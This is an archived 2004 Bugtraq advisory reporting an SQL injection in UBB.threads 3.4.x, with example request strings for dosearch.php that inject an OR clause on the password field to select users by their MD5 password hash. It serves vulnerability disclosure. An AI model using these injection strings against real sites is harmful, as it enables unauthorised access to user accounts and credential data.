bugtraq - SQL Injection in UBB.threads 3.4.x

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives

Hash Suite: Windows password security audit tool. GUI, reports in PDF.

[<prev] [next>] [day] [month] [year] [list]

Message-ID: <006b01c4b7ad$7ee3f3b0$0a01a8c0@remote>
Date: Thu, 21 Oct 2004 22:35:24 +0200
From: "Florian Rock" <florianrock@....de>
To: <bugs@...uritytracker.com>
Cc: <bugtraq@...urityfocus.com>, <full-disclosure@...ts.netsys.com>
Subject: SQL Injection in UBB.threads 3.4.x


Product:
========
UBB.threads

Vendor:
=======
UBBCentral (http://www.ubbcentral.com/)

Versions:
=========
I tested it successfull on 3.4.x
At Version 3.5 you need to be logged in to perform a search. I didnt tested 
this version.

Problem:
========
Sql-Injection in dosearch.php
dosearch.php?Name=' OR U_Password='PWINMD5

Impact:
=======
A remote user can inject SQL commands

Example:
========
db5c82346d770f48bdd8929094c0c695 (ubbpass)

/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695
OR
/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695'/*
-> selects a user who got "ubbpass" as password.

Greets fly out to:
==================
felx, zodiac, nostalg1c, chris, lexxor, haggi, li, xlr, rest of p32,
peti, danjo, milch_trinker, hecky, and all i forgot

Greets
Florian Rock aka Remoter